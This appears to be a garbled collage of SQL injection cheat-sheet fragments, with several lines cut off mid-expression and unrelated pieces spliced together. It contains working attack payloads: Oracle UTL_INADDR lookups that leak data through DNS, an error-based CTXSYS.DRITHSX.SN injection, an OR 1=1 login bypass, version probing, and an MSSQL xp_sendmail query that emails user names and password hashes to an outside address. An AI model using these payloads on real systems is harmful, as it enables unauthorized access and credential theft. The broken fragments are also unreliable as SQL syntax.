SQL> SELECT UTL_INADDR.get_host_address from dual
...utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual.
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(113)||chr(120)
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(100)||chr(114)||chr(118)||chr(54)||chr(119)||chr(120)||chr(116)||chr(103)||chr(117)||chr(121)||chr(120)||chr(110)||chr(49)|.
23. SQL injection in LIMIT (M) queries. Example: SELECT id, product FROM test.test LIMIT 0,0
To use this method, users must have utl_http access to the network.
SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password = ''; (3) Version testing. SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'
select * from AdventureWorks.HumanResources.Employee where EmployeeID = 1; EXEC master.dbo.xp_sendmail @recipients=N'[email protected]', @query = N'select user, password from sys.syslogins where password is not null' ; • Unless you get really lucky to be injected into PL/SQL.